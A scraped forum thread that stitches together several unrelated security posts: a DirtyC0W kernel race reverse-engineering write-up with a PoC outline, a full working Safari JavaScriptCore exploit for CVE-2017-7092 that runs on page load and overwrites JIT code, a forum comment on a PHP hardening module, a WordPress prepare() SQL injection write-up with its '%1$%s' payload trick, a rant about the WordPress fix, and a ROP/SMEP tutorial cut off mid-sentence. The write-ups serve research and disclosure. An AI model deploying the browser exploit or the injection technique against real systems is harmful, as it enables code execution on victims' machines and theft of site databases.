Reversing DirtyC0W Date Mon, 25 Sep 2017 By fred Tags reverse engineering / kernel / race-condition / reven Everybody keeps in mind the Dirtyc0w Linux kernel bug. For those who don't, take some time to refresh your memory here. The kernel race condition is triggered from user-space and can easily lead a random local user to write into any root owned file. In this article, we will demonstrate how REVEN can help reverse engineering a kernel bug such as Dirtyc0w. Our starting point will be a REVEN scenario recording of an occurence of the bug, together with the corresponding execution trace generated by REVEN. From that point on, we will: have a look at the POC that was used to trigger the bug find an interesting point to start the analysis time-travel and follow the data-flow backward to understand where it comes from find the location in the trace where the race condition occurs detect unique code path vs multiple instances find matching Linux kernel source-code and derive the missing semantic conclude The REVEN technology used throughout the article has been designed by Tetrane to perform deterministic analysis of whole running systems at the CPU, Memory, Device level. Its implementation comprises a REVEN server together with the Axion client GUI. One can also interact with the REVEN server through the REVEN Python API, from Python or third-party tools such as IDA-Pro, Kd/Windbg, GDB, Wireshark, etc. The exploit POC we'll use You can find the source code of the Dirtyc0w POC I've used here. In short the big picture is: void print_head_target_file(const char* filename){ //print the file content } void *madviseThread(void *arg){ for() // always says we don't need the mapped area madvise(map,100,MADV_DONTNEED); } void *procselfmemThread(void *arg){ int f=open("/proc/self/mem",O_RDWR); for() // always tries to write into the mmaped file through the process virtual address interface lseek(f,(uintptr_t) map,SEEK_SET); write(f,str,strlen(str)); } int main(){ print_head_target_file(target_filename); f=open(target_filename,O_RDONLY); //MAP_PRIVATE => will trigger the Copy On Write (COW) map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0); run_the_2_looping_threads close(f); print_head_target_file(target_filename); return 0; } In this article and in the screenshots of Axion below, the madviseThread will be displayed in Blue, and the procselfmemThread will be displayed in Magenta. Looking for some point to start in the trace First, let's have a look at the framebuffer at the beginning of the trace. To do this, we use the timeline widget at the bottom of the screen in Axion, placing the red dot (current position) at the full left. The framebuffer (Menu Windows->Views->Framebuffer) is quite empty: Now at the end (red dot at full right): we see that the content of the file /etc/issue.net is modified: from "Debian GNU/Linux 8" at the beginning, it becomes "_TETRANE_REVEN_DIRT" at the end. So, the recorded scenario and the trace generated by the REVEN simulator successfully captured the race condition that overwrites, from a standard user account, some root-only writable file: Following the data flow backward (time-travel) We now want to track the string "_TETRANE_REVEN_DIRT" backward in the trace. To do so, we open the REVEN-Axion Strings widget (Menu Windows->Views->Strings or shortcut alt-s), and look at the following string history:We select the first string access (timestamp #3719945_0), that brings us to the related location in the recorded trace. From the Backtrace widget and the timeline, we derive that this location displays the content of the file at the end of the trace (print_head_target_file() and red dot in timeline).So we look at the input buffer (ds:[esi]) (see tooltip when selecting the parameter):It opens a memory dump widget for this pointer, at this trace location:We select the first byte and look at the data history (REVEN-Axion has a database of every memory access for the whole trace). We see that the physical memory pointed to by this virtual address (0x7b:0xd49bb000) is only accessed a few times. First accesses come from a hardware peripheral ("PCI direct access" at early timestamp #13655_2): We select the first write in the Data History widget, which brings us to the related trace location. We can see that the write is the first access to disk to read the file (see the content is "Debian GNU/Linux 8"). The main process was waiting for this IO and scheduled an idling process:But the current topic is not about asynchronous IO in Linux (even though it is very interesting in fact!), let's keep it for another time ;). Find the race condition location in the trace So we know we have here the file kernel cache buffer, located at 0x7b:0xd49bb000. And we see that we're writing in it at sequence #2590141_0 in the trace. Let's go there. We see (yellow in the dump) that the current instruction is changing data in our beloved buffer. We can check with the before/after buttons in the Memory dump that we are overwriting the buffer content for the first time. On the left, in the Hierarchical trace, we see that there is a __schedule from madviseThread few timestamps before. At the bottom of the screen, in the timeline, we see the current location (red dot) and we see that we've just resumed the magenta thread.If we go back to where the thread was interrupted, we can see the full backtrace. Axion makes it easy: from the current sequence point, scroll-up, find the end of __get_user_pages (#2590124). Pressing '%' automatically finds the matching "call" of the selected "ret". It brings us to sequence #1148384 (before the magenta thread was scheduled-out). Here we have the complete backtrace : procselfmemThread->write->mem_write->mem_rw->access_remote_vm->__access_remote_vm Let's go back to sequence #2590141 (WRITE point). We want to trace back edi to know where the “faulty” pointer comes from. To avoid overtainting (edi depends also of ecx because of “rep” prefix) scroll-up, at #2590140_7, and select eax. Clicking the Taint button and Backward in the Data Painter pane highlights the backward taint in the trace, which contains too many things when we scroll-up a little. So, from the same start point, we use the Tainter Graph instead (Windows->Miscellaneous->Tainter Graph), that helps to interactively follow the data and discard pointers paths. Following data, we go to sequence #258998_0, the last "recent" point before jumping to #11661_0 (which is in the initial read() that loads data from disk, as seen before). #258998_0 is in filemap_map_pages, backtrace is: __get_user_pages->handle_mm_fault->do_read_fault->filemap_map_pages. BTW, we find our RED tainted data flow again Unique vs multiple instances Searching for this eip address (0xc10e31d0) in the trace, we see we only went there once in the whole trace (see in the search widget at the bottom of the screen, search results are shown as vertical bars in the timeline): Same search for do_read_fault (0xc1105040) returns only one occurence in the trace. Same search for handle_mm_fault (0xc110561d) returns 4020 occurences in the trace. -> cool, it seems a test in there is the cause of the unique behavior we're investigating \o/ We search for the conditional jump that is only taken once: search 0xc110572a: 3 results 0xc1105720 idem 0xc110570b idem 0xc11056f8 idem 0xc1105678 4020 times -> the condition we're looking for is at #2589960_9. 0xc1105698 je 0xc11056f8($+94 and the test is just before: 0xc1105692 and ebx, 0x101 So we taint this ebx for backward analysis (see green track). It is straightforward: in the Data Painter widget, green track, click on Min point #1149154_2 that will time-travel when the taint becomes empty. In the assembly view, we see our tainted memory is set to zero at #1149154_3, so the tainter successfully brought us at the right position in time. At this point we are in the Blue thread, at the very beginning of the thread, the backtrace is: madviseThread->syscall->zap_page_range->unmap_single_vma We've found that in the magenta thread, a data (at 0x7b:0xde413e50) is written then read. Between the write and the read, the blue thread has overwritten this data at #1149154_3. The data was used by the following instruction that will lead to a conditional jump: should we use the copied buffer (normal case) or the original one (i.e. the real file cache)? 0xc1105692 and ebx, 0x101 So, if we sum up what we have: By the end of the trace we display the content of the file. This content comes directly from the file-cache buffer. Thanks to data-accesses history, we directly see where this data was written in the magenta thread (the one that always tries to write the ReadOnly file). It was just after interruption by the blue thread (the thread that always says we can un-map the virtual space range that maps the ReadOnly file). We quickly identify what portion of code is executed only for the ‘faulty’ write. We identify the condition in code that causes the execution flow to go to this path. We track back the checked data and see it was written by the blue thread, so we identified the "race condition": some data is written in a thread and leads the other thread to a bug. Match with Linux sources (Please note that this is easy to show live, but trickier to explain in screenshots/text. This article is already too long, so here is the fast summary ) We use the REVEN static vision of the dynamic execution to see statically what was executed around our interesting code. 0xc1105692 and ebx, 0x101 0xc1105698 je 0xc11056f8($+94 A cool feature is that when you move your mouse over the trace, the graph highlights its related blocks. So you can follow interactively the dynamic code under your mouse in the static view. In this view, only code that is executed at less once in the trace is displayed. So you are not polluted by code you don't want to see. Now, a very quick comparison of Linux source code (some greps with symbols found in the static graph) and executed binaries makes us discover the matching line in Linux => mm/memory.c:3199 if (!pte_present(entry)) Which expands to (pte_flags(entry) & (_PAGE_PRESENT | _PAGE_PROTNONE)). And browsing linux sources, we see _PAGE_PRESENT=0x1, _PAGE_PROTNONE=0x100, so the 0x101 in assembly. (a lot of functions are inlined, so the matching require some linux kernel habits ) 3191 static int handle_pte_fault(struct mm_struct *mm, 3192 struct vm_area_struct *vma, unsigned long address, 3193 pte_t *pte, pmd_t *pmd, unsigned int flags) 3194 { 3195 pte_t entry; 3196 spinlock_t *ptl; 3197 3198 entry = *pte; 3199 if (!pte_present(entry)) { 3200 if (pte_none(entry)) { 3201 if (vma->vm_ops) 3202 return do_linear_fault(mm, vma, address, 3203 pte, pmd, flags, entry); 3204 3205 return do_anonymous_page(mm, vma, address, 3206 pte, pmd, flags); 3207 } 3208 if (pte_file(entry)) 3209 return do_nonlinear_fault(mm, vma, address, 3210 pte, pmd, flags, entry); 3211 return do_swap_page(mm, vma, address, 3212 pte, pmd, flags, entry); 3213 } 3214 3215 if (pte_numa(entry)) 3216 return do_numa_page(mm, vma, address, entry, pte, pmd); 3217 3218 ptl = pte_lockptr(mm, pmd); 3219 spin_lock(ptl); 3220 if (unlikely(!pte_same(*pte, entry))) 3221 goto unlock; 3222 if (flags & FAULT_FLAG_WRITE) { 3223 if (!pte_write(entry)) 3224 return do_wp_page(mm, vma, address, 3225 pte, pmd, ptl, entry); 3226 entry = pte_mkdirty(entry); 3227 } In REVEN, we have tainted ebx backward, saw that it is reset by madvise(), which overrides value initially set by the first do_cow_fault. Flags value was 0x65 then. With 0x65 instead of 0x0, the ebx&0x101 (i.e. pte_present(entry)) would have returned true, and we would have taken the do_wp_page() (write-protection fault, that would have copied the page as usual) instead of the do_linear_fault()(that gives access to page containing the file cache buffer). Now we have the full vision of the kernel bug exploited by the user-space POC. Conclusion Using REVEN and the Axion GUI on a kernel race-condition case has proven to be quite useful, as its non-intrusive way of working doesn't alter the analyzed system behavior. It allows an analyst to quickly browse the execution trace from the end to the beginning (time-travel and backward analysis). Thanks to Axion unique features, the analyst can then find points of interest and understand what is going on. Using REVEN and Axion, an experienced user with strong low-level skills can reverse such a trace in about 7 minutes. Sursa: http://blog.tetrane.com/2017/09/dirtyc0w-1.html
-
- 1
-
-
<html> <head> <script> // b JavaScriptCore`JSC::CopiedSpace::didStartFullCollection() + 218 big_array = []; debug = 0; arr = []; evil_buffer = {}; bigarray_buffer_index = 0; buffer_arr_index = 0; function_to_shellcode = {} function log(txt) { var c = document.createElement("div"); c.innerHTML = "log: " + txt; d.appendChild(c); } function debug_alert(str){ if(debug){ alert(str); log(str); } } function gc() { debug_alert("gc"); for(i = 0;i < 0x924924;i++){ //0x4924924 arr[i] = new ArrayBuffer(20); //54 } debug_alert("gcc"); } function gc2() { try { var c = document.createElement("canvas"); var gl = c.getContext("2d"); for (var i = 0; i < 100; i++) { var gggg = gl.createImageData(1, 0x10000/4) } } catch (e) { } } function make_a_big_hole(){ g = [] gg = "g".repeat(0x7fff1000) debug_alert("big_hole"); for(var i = 0; i < 5;i++){ g[i] = String.prototype.fontsize.call(gg,5); } debug_alert("after_big_hole"); for(var i = 0; i < 0x3;i++){ g[0] = null; //gc //g[1] = null; g[2] = null; //".replace g[3] = null; //hole } //g = null; debug_alert("big_array"); init_big_array_len = 0x10000000; g[2] = new Array(init_big_array_len); g[2].fill(1.1); debug_alert("after_big_array"); big_array = g[2]; //evil_float64 = new Float64Array(new ArrayBuffer(0x7ffffff0)); //arr2 = []; arr2[0] = evil_float64; //heap_feng_shui(); gg = null; gc(); } function make_evil_data(){ nop = "\x00" nop_data = "" offset = 0x38 + 0x1e +0x38 nop_data = nop.repeat(offset/2); //nop_data = nop_data + "\xff\xff\xff\xff\x00\x00\x00\x00\xff\xff\xff\xff" nop_data = nop_data + unescape("%uffff%uffff%uffff%uffff") + "\x00\x00\x00\x00" + unescape("%uffff%uffff%uffff%uffff"); ff = "\x00" ff_data = ff.repeat((0x1000-offset-0x18)/2); return nop_data + ff_data; } function heap_feng_shui(){ debug_alert("heap_feng_shui"); arr2 = [] buffer_arr = [] /* for(var i = 0;i < 20;i++){ //arr2[i] = new Array(0x1000); buffer_arr[i] = new Float64Array(0x2000001); // buffer_arr[i].fill(1.1); //float64 1.1 == array 1.0375 }*/ for(var i = 0;i < 0x18000;i++){ evil_float64 = new Float64Array(new ArrayBuffer(0x8000)); evil_float64.fill(1.1); buffer_arr[i] = evil_float64; } debug_alert("after_heap_feng_shui"); } function f64tou32(number){ a = new Float64Array(0x8); a.fill(number); b = new Uint32Array(a.buffer); result = []; result[0] = b[0]; result[1] = b[1]; return result; } function u32tof64(arr){ b = new Uint32Array(0x8); b[1] = arr[1]; b[0] = arr[0]; a = new Float64Array(b.buffer); return a[0]; } function read_obj(obj){ big_array[bigarray_buffer_index] = obj; f64_address = buffer_arr[buffer_arr_index][0x50/8]; uint32 = f64tou32(f64_address); // alert(uint32[1].toString(16)+ " " + uint32[0].toString(16)); return uint32; //alert(uint32[1].toString(16)+ " " + uint32[0].toString(16)); } function fake_obj(arr_address){ f64_address = u32tof64(arr_address); // alert(f64_address); buffer_arr[buffer_arr_index][0x50/8] = f64_address; // alert("here"); return big_array[bigarray_buffer_index]; } function randomString(){ chars = "abcdefghijklmnopq"; maxPos = chars.length; result = ""; for(i = 0;i < 0x8;i++){ result += chars.charAt(Math.floor(Math.random() * maxPos)); } return result; } function sprayFloat64ArrayStru(){ for(var i = 0; i < 0x1000;i++){ var a = new Float64Array(1); a[randomString()] = 1337; } } function Int64(arr){ uint32 = []; uint32[0] = arr[0]; uint32[1] = arr[1] - 0x10000; f = u32tof64(uint32); return f; } function Int64_add(arr,num){ arr[0] = arr[0] + num; return arr; } function read_64(addr){ f = u32tof64(addr); fakearray[0x2] = f; result = []; result[0] = evil_buffer_array[0]; result[1] = evil_buffer_array[1]; //alert(result[1].toString(16)+ " " + result[0].toString(16)); return result; } function write_32(addr,data){ f = u32tof64(addr); fakearray[0x2] = f; evil_buffer_array[0] = data; } function make_jit_function(){ func_body = "eval('');abc = [];" for(i = 0;i<500;i++){ func_body += "abc[" + i.toString() + "];" } function_to_shellcode = new Function("a",func_body); // alert("here") for(i = 0;i < 100; i++){ function_to_shellcode(); } // alert("here") } function trigger() { //alert(2); // make_jit_function(); evil_data = make_evil_data(); a = evil_data.repeat(0x7fff0000/0x800); z = a.slice(1); x = "\"".repeat(0x2aaaaaa0); //alert("1"); // alert(evil_data.length.toString(16)); make_a_big_hole(); z = String.prototype.link.call(a,x) alert("The Array length is 0x" + big_array.length.toString(16)); heap_feng_shui(); //z = null; //a = null; //x = null; // heap_feng_shui(); //alert("end"); //Array.prototype.slice.call(arr,1); //Array.prototype.slice.call(buffer_arr,1); t = Array.prototype.slice.call(big_array,0x10000001,0x10000002); t = Array.prototype.slice.call(buffer_arr,1,2); if(big_array.length != init_big_array_len){ // alert("Success!The Array length is 0x" + big_array.length.toString(16)); // alert(big_array[0x1]); /*for(var i = 0x10000000;i < big_array.length;i++){ if(big_array[i] != undefined && big_array[i] != -1){ alert(i.toString(16)); alert(big_array[i]); } }*/ flag = 0; for(var i = 0x35000000;i < 0x4a000000;i=i+0x2000){ //0x4a000000 //alert(i.toString(16)); if(big_array[i] == 1.0375){ alert("find Success"); bigarray_buffer_index = i; big_array[bigarray_buffer_index] = 3.3333333; j = 0; while(j<0x18000){ if(buffer_arr[j][0x50/8] != 1.1){ buffer_arr_index = j; flag = 1; break; } j++; } break; } } if(flag == 0){ alert("can't find buffer!"); window.location.reload(); } } else{ alert("can't overwrite the length!"); window.location.reload(); } //alert(buffer_arr_index); make_jit_function(); sprayFloat64ArrayStru(); evil_buffer_array = new Uint32Array(0x1000); var jsCellHeader = Int64([0x00001000,0x11827000]); var lengthFlags = Int64([0x00000010,0x00010000]); var container = { jsCell : jsCellHeader, butterfly : false, vector : evil_buffer_array, lengthAndFlags : lengthFlags }; address = Int64_add(read_obj(container),0x10); //alert(address[1].toString(16) + " " + address[0].toString(16)); fakearray = fake_obj(address); //String.prototype.link.call(container); while(!(fakearray instanceof Float64Array)){ i = 1; jsCellHeader = Int64([0x00001000+i,0x11827000]); container.jsCell = jsCellHeader; i++; } //String.prototype.link.call(fakearray); func_addr = read_obj(function_to_shellcode); // alert(func_addr[1].toString(16)+ " " + func_addr[0].toString(16)); executableAddr = read_64(Int64_add(func_addr,0x18)); jitCodeAddr = read_64(Int64_add(executableAddr,0x18)); codeAddr = read_64(Int64_add(jitCodeAddr,0x20)); write_32(codeAddr,0xcccccccc); //codeAddr = read_64(Int64_add(jitCodeAddr,0x10)); //write_32(codeAddr,0xcccccccc); alert("begin_shellcode!!!!!!"); function_to_shellcode(); alert("end"); } </script> </head> <body onload="trigger()"> <pre id="d"> </pre> </body> </html> Sursa: https://github.com/xuechiyaobai/CVE-2017-7092-Exploit
-
Da, interesant, cuvinte mari... "We’re kind of killing it by filtering the $, |, ;, ` and & chars in our default configuration, making it a lot harder for an attacker to inject arbitrary commands." -> Si daca aceste caractere sunt folosite in mod constient de developer? Modulul poate crea probleme. La urma urmei, nu prea ai cum sa "kill a bug class" cat timp limbajul iti permite acel "bug class". De exemplu, in Java, pentru a rula un proces de sistem cu "ProcessBuilder", trebuie sa ii dai ca parametri un List<String>, adica un vector unde primul element e comanda (e.g. ls, cat etc.) iar fiecare parametru urmator e un argument. Nu tine cont ca acel parametru contine spatii sau caractere speciale, e tratat ca un argument, ofera un fel de de "Prepared Statements" pentru executia de procese. "The goto payload for XSS is often to steal cookies. Like Suhosin, we are encrypting the cookies with a secret key, the IP of the user and its user-agent. This means that an attacker with an XSS won’t be able to use the stolen cookie, since he (often) can’t spoof the IP address of the user." -> Oare face doar """encryptie""", care e mult prea mult spus daca e vorba doar de adresa IP si de user-agent, sau verifica si adresa IP pe server? "This feature can’t be deployed on websites that already stored serialized objects (ie. in database)" -> Cred ca acesta e cel mai comun caz, din pacate. Abordarea este interesanta, instalezi un modul si ai scapat de probleme. Insa din motive logice, nu este si nu o sa fie niciodata de ajuns. Problema pleaca de mai sus, daca ii permiti unui user sa faca rahaturi, si nu il fortezi sa scrie cod sigur, o sa ai probleme.
-
The Humble Book Bundle: Hacking Reloaded presented by No Starch Press
Nytro replied to yukti's topic in Stiri securitate
Pay $1 (about €0.84) or more! Game Hacking Nick Cano The Car Hacker's Handbook Craig Smith The Smart Girl's Guide to Privacy Violet Blue Metasploit David Kennedy, Jim O’Gorman, Devon Kearns, Mati Aharoni 35% off Print Books from nostarch.com Pay $8 (about €6.69) or more to also unlock! Penetration Testing Georgia Weidman iOS Application Security David Thiel Android Security Internals Nikolay Elenkov The Book of PF Third Edition Peter N. M. Hansteen Practical Forensic Imaging Bruce Nikkel Pay $15 (about €12.54) or more to also unlock! The Book of PoC || GTFO Manul Laphroaig New Bestseller! Hacking Second Edition Jon Erickson The IDA Pro Book Second Edition Chris Eagle The Practice of Network Security Monitoring Richard Bejtlich Absolute OpenBSD Second Edition Michael W. Lucas Practical Packet Analysis Third Edition Chris Sanders -
slavco Aug 23 Wordpress SQLi There won’t be an intro, let us jump to the problem. This is the wordpress database abstraction prepare method code: public function prepare( $query, $args ) { if ( is_null( $query ) ) return; // This is not meant to be foolproof — but it will catch obviously incorrect usage. if ( strpos( $query, ‘%’ ) === false ) { _doing_it_wrong( ‘wpdb::prepare’, sprintf( __( ‘The query argument of %s must have a placeholder.’ ), ‘wpdb::prepare()’ ), ‘3.9.0’ ); } $args = func_get_args(); array_shift( $args ); // If args were passed as an array (as in vsprintf), move them up if ( isset( $args[0] ) && is_array($args[0]) ) $args = $args[0]; $query = str_replace( “‘%s’”, ‘%s’, $query ); // in case someone mistakenly already singlequoted it $query = str_replace( ‘“%s”’, ‘%s’, $query ); // doublequote unquoting $query = preg_replace( ‘|(?<!%)%f|’ , ‘%F’, $query ); // Force floats to be locale unaware $query = preg_replace( ‘|(?<!%)%s|’, “‘%s’”, $query ); // quote the strings, avoiding escaped strings like %%s array_walk( $args, array( $this, ‘escape_by_ref’ ) ); return @vsprintf( $query, $args ); } From the code there are 2 interesting unsafe PHP practices that could guide towards huge vulnerabilities towards wordpress system. Before we jump to the SQLi case I’ll cover another issue. This issue is rised from following functionality: if ( isset( $args[0] ) && is_array($args[0]) ) $args = $args[0]; This means that if you have something like this: $wpdb->prepare($sql, $input_param1, $sanitized_param2, $sanitized_param3); then if you control the $input_param1 e.g. is part of the $input_param1 = $_REQUEST[“input”], this means that you can add your own values for the remaining parameters. This could mean nothing in some cases, but in some cases could easy lead to RCE having on mind nature and architecture of the wp itself. SQLi vulnerability In order to achieve SQLi in wp framework based on this prepare method we must know how core PHP function of this method works. It is vspritf which is in fact sprintf. This means that $query is format string and $args are parameters => directives in the format string define how the args will be placed in the format string e.g. query. Very, very important feature of sprintf are swapping arguments :) As extra there we have the following lines of code: $query = str_replace( “‘%s’”, ‘%s’, $query ); // in case someone mistakenly already singlequoted it $query = str_replace( ‘“%s”’, ‘%s’, $query ); // doublequote unquoting $query = preg_replace( '|(?<!%)%f|' , '%F', $query ); // Force floats to be locale unaware $query = preg_replace( '|(?<!%)%s|', "'%s'", $query ); // quote the strings, avoiding escaped strings like %%s e.g. will replace any %s into '%s'. From everything above we got following conclusion: If we are able to put into $query some string that will hold %1$%s then we can salute our SQLi => after prepare method is called then we will have an extra 'into query, because %1$%s will become %1$'%s' and after sprintf will become $arg[1]'. For now this is just theory and most probably improper usage of the prepare method, but if we find something interesting in the wp core than nobody could blame the lousy developers who don’t follow coding standards and recomendations from the API docs. Most interesting function is delete_metadata function and this function perform the desired actions from description above and when it is called with all of the 5 parameters set and $meta_value != “” and $delete_all = true; then we have our working POC e.g. if ( $delete_all ) { $value_clause = ‘’; if ( ‘’ !== $meta_value && null !== $meta_value && false !== $meta_value ) { $value_clause = $wpdb->prepare( “ AND meta_value = %s”, $meta_value ); } $object_ids = $wpdb->get_col( $wpdb->prepare( “SELECT $type_column FROM $table WHERE meta_key = %s $value_clause”, $meta_key ) ); } $value_clause will hold our input, but we need to be sure $meta_value already exists in the DB in order this SQLi vulnerable snippet is executed — remember this one. This delete_metadata function called with desired number of parameters is called in wp_delete_attachment function and this function is called in wp-admin/upload.php where $post_id_del input is value taken directly from $_REQUEST. Let us check the wp_delete_attachment function and its constraints before we reach the desired line e.g. delete_metadata( ‘post’, null, ‘_thumbnail_id’, $post_id, true );. The only obstacle that prevents this code to be executed is the following: if ( !$post = $wpdb->get_row( $wpdb->prepare(“SELECT * FROM $wpdb->posts WHERE ID = %d”, $post_id) ) ) return $post; but again due the nature of sprintf and %d directive we have bypass => attachment_post_id %1$%s your sql payload. Here I’ll stop for today (see you tomorrow with part 2: https://medium.com/websec/wordpress-sqli-poc-f1827c20bf8e), because in order authenticated user that have permission to create posts to execute successful SQLi attack need to insert the attachment_post_id %1$%s your sql payload as _thumbnail_id meta value. Fast fix for this use case (if you allow `author` or bigger role to your wp setup): At the top of the wp_delete_attachment function, right after global $wpdb; add the following line: $post_id = (int) $post_id; Impact for the wp eco system This unsafe method have quite huge impact towards wp eco system. There are affected plugins. Some of them already were informed and patched their issues, some of them put credits, some not. Another ones have pushed `silent` patches, but no one cares regarding safety of all. In the next writings of this topic I’ll release most common places/practices where issues like this ones occurs and will release the vulnerable core methods beside pointed one, so everyone can help this issue being solved. Responsible disclosure This approach is more than responsible disclosure and I’ll reffer to the paragraph for the impact and this H1 report https://hackerone.com/reports/179920 Promo If you are wp developer or wp host provider or wp security product provider with valuable list of clients, we offer subscription list and we are exceptional (B2B only). Sursa: https://medium.com/websec/wordpress-sqli-bbb2afcc8e94
-
On WordPress Security and Contributing …and how neither really worked today. A sad story in two parts, where I’m rash, harsh and untactful. An explanation, a rant, a call for support, a call for action. You do not have to agree with me, I may be just an asshole and haven’t realized it yet Part 1: The %1$%s vulnerability This post will overview two issues that have hit me where it hurts with the recent WordPress 4.8.2 release. A handful of issues were addressed, among which a vulnerability in $wpdb->prepare which was fully disclosed 4 weeks ago here. But let’s start from the very beginning. A very long time ago a bad decision was made. wpdb->prepare was born which was based on sprintf functionality. The Codex states that the method provides “sprintf-like” functionality but only supports %d, %s and %f placeholders. Cool. As time went on, people figured out that numbered placeholders also work in this function and it was used at liberty, all over the place. Yoast SEO used, some Automattic internal code used, as well as a crapton of other instances of usage from GitHub’s search: https://github.com/search?q=wpdb->prepare+%1%24s&type=Code&utf8=✓ What they didn’t know is that numbered placeholders are not safe to use. First and foremost, numbered placeholders were not escaped. So $wpdb->prepare( 'SELECT * FROM wp_posts WHERE post_ID = %1$s', '1 OR 1 = 1' ); would actually yield a SQL injection, as the placeholder is not quoted it would result in SELECT * FROM wp_posts WHERE post_ID = 1 OR 1 = 1;. Classic. The developers who figured this out (because most of the SQL would actually break when using numbered placeholders without quotes) the usage was as safe as sprintf was. Then along comes a security researcher, discloses a vulnerability in $wpdb->prepare and states that if a developer makes a mistake and types %1$%s instead, then there’s potential for SQL injection. How? %1$%s gets transformed to %1$'%s' by $wpdb->prepare, because one of the features of the method is to unquote instances of "%s" and '%s' and then quote them again. What does sprintf do? %1$' get eaten up as an invalid placeholder, while %s' is left up for grabs and get transformed into whatever we wanted but only with a single quote at the end of it, breaking the SQL. An exploit would need: 1. A developer to make a typo and not notice is in the highlighted syntax of the code editor, 2. the attacker to have access to the input parameters. A hypothetical piece of code would be SELECT * FROM wp_users WHERE user_ID = %1$%s OR user_ID = %2$%s. With both inputs controlled by the attacker we can get the following if argument 1 is “1 OR 1 != ” and argument 2 is “injection”: SELECT * FROM wp_users WHERE user_ID = 1 OR 1 != ' OR user_ID = injection'. Which would simply return true for all users, because 1 is not equal to “OR user_ID = injection”, is it? So think of the chances of such code existing in the wild. Now think of the chances $wpdb->prepare is not used. Probably slim. At least but what we know of the vulnerability and how much has been disclosed. Four weeks later WordPress 4.8.2 enters the scene unexpectedly. And the patch it contains simply prevents anything other than %s, %f and %d from existing. Hell breaks lose. Sites with Yoast SEO installed on them stop functioning in the backend due to some code that relied on numbered placeholders. Needless to say, the aftermath of this decision will be felt for many months to come. Generated SQL with numbered placeholders is invalid SQL, a database error is thrown, a 500 error is returned in the browser. They call this “hardening”. A patch to “prevent plugins and themes from accidentally causing a vulnerability”. That’s funny. Why don’t we prevent stray quotes in the query? Or why don’t we prevent calls to $wpdb->query without a preceding call to $wpdb->prepare or unite them into one and break code that does not escape? But I’m very sure the security team have wrecked their heads for weeks and this was the decision that had to be made. Who stood behind the final decision, what was the reasoning, how will the aftermath be dealt with, nobody knows. Us risky developers can only comply. We can only wholeheartedly trust that the countless nights of sleep were lost pondering the better ways of solving the issue. And I’m not going to comment on how a zero-day was out in the public for 4 weeks and how nobody was made aware of the breaking change to $wpdb->preapare. I don’t really care at this point. Policy is policy, whoever got into trouble has already spoken (or will) about how nobody was notified about a used breaking change. It was undocumented, it’s ultimately the fault of who used it. Thus, I can’t call this a regression as developers relied on undocumented functionality. It’s not a a bug either. But wouldn’t it be great if $wpdb->prepare would actually support numbered placeholders? Seeing that it’s been used and will continue to be attempted to be used for years to come, I would say it’s a good idea. Why hasn’t anyone requested this before? Well, because it worked. Now, since it no longer works. A trac ticket requesting the feature is due, so that the community can figure out a way to introduce documented support for these popular numbered placeholders. Part 2: The feature request Meet ticket #41925 the first of a handful of duplicates that wanted numbered placeholders “back”. A discussion (or at least a monologue for now) to see how we can introduce their safe support in $wpdb->prepare, why the security team had to do what they did. I quickly threw a patch together to get the ball rolling as well as some test cases. In less than 12 hours a wontfix/close decision was made by one of the decision makers. Biased by some sort of undisclosed test cases that my patch failed to pass. Biased by what the team tried to do with the vulnerability. Biased by the internal misfortunes and hurdles they were met with while trying to solve it. Biased by the fact that numbered placeholders were not supported to begin with. Just like that. A wontfix/closed stamp. Where’s the discussion? Where’s the test cases that fail? Is it not a valid feature request? We’ve had more absurd ones hang open for years. Why is a valid feature request, all of a sudden stamped in way similar to some of the most silly single-line feature requests out there? Why should a though-through, code-heavy and well-versed (at least in my opinion, but hey, I’m biased) ticket be carrying the stigma of a wontfix/closed? Discouraging people from actively participating in exploring the problem space and finding a solution because one of the higher-ups said “No way, Jose?” A disrespectful spit in the face is what I felt. After spending over 8 hours trying to understand what the issue is, how we can begin to address it? Shut down. Just like that? And an hour after the feature request is closed as wontfix Slack has this weekly or monthly (I don’t know) new contributors day, where developers and designers are encouraged to work on issues, etc. Oh, the freaking irony! If this is not hypocrisy, I don’t know what is. Again. It’s a feature request. It’s related to a vulnerability. In order to implement a good solution we have to dissect the vulnerability, there’s no other way, whether you like it or not. We have to write hundreds of test cases, try and break the proposed solutions. But a wontfix/closed? “Why bother?”, would say a passerby. “Oh, but you can still discuss and comment on it. And you can even reopen it.” some would say. After all the “encouragement”? After a core committer does an action that is literally equal to saying “We won’t fix this, no point in trying. Shoo away, go home, kids.” when effort and determination to get things going is clearly shown? Such disregard is pretty offensive and depressing. After speaking to several other people from the Russian community, I’ve been told that this behavior not unheard of. The almighty “No” of the higher ups, just because. The community is sometimes met with hurdles upon hurdles, a contributing environment that sometimes verges on the disgusting. Is this really the WordPress open-source project? Part 3: On safety nets vs. bad code. Sursa: https://codeseekah.com/2017/09/21/on-wordpress-security-and-contributing/
-
Return Oriented Programming Tutorial Hi in this tutorial we will go throw a very basic way of creating a ROP (Return Oriented Programming) Chain in order to bypass SMEP and get kernel mode execution on latest windows installation despite microsoft mitigation's. Setup: This tutorial is meant to be an active tutorial meaning that its best you will download the binary provided for the tutorial and experiment on your own with the main idea's presented. So this is what you will need in order to run the full tutorial by your own: HEVD: download from here. Windows 10 RS3 Here. WinDbg & Symbols: * kd. Symbols. Hyper-V: * How To unable hyper-v. Setup File sharing beetwin the machine and the host:* Setup File Sharing.. My Debug Binary: * download link.. Introduction: Return Oriented Programming (in the computer security context) is a technique used to bypass certain defence mechanisms, like DEP (Data execution Prevention) & SMEP. if you would like to read more about smep you can check out the link at the main README.md file of this project. the main charicteristic of this method is that instead of running pure shell code directlly from a user supplied buffer we instead use small snipets of code called gadgets. say for example i want to place 0x1FA5 in rsp, useally i will simply write in my shellcode: mov rsp, 0x1FA5 instead when using rop we will try to find some address in memory (this can be a dll an exe image or the kernel image), that will do exactly the same. and instead of writing it in the payload we will place that memory address of that function to be executed instead. so lets say i know that at a certain Offset from the base address of some dll say hal.dll there is a good instruction, then assuming that i can get code execution if i will pass the address of that function to the exploit target on runtime it will get executed. when building a rop chain the chain will be computed from many small gagdets like this one, you can think a bout it like shellcoding with snippets from other executable memory. here is a little snippent to visualize this: so in that picture as an example we will send to our exploit target a buffer that contains: hal+0x6bf0 followed by hal+0x668e .. and so on. You may ask yourself: why would we want to do that? why not simply write the shellcode as is? Well if you can simply write the shellcode as is then it is far easy to do that, but as mentioned b4 it may not allways be possible. so lets say a little about smep. smep is a security massure that uses hardware features in order to protect the endpoint from exploits such as kernel exploits. the main idea is to mark eache page allocated in the memory as eather kernel address space (K-executable/r/w) or user space. this way when the kernel executes code that 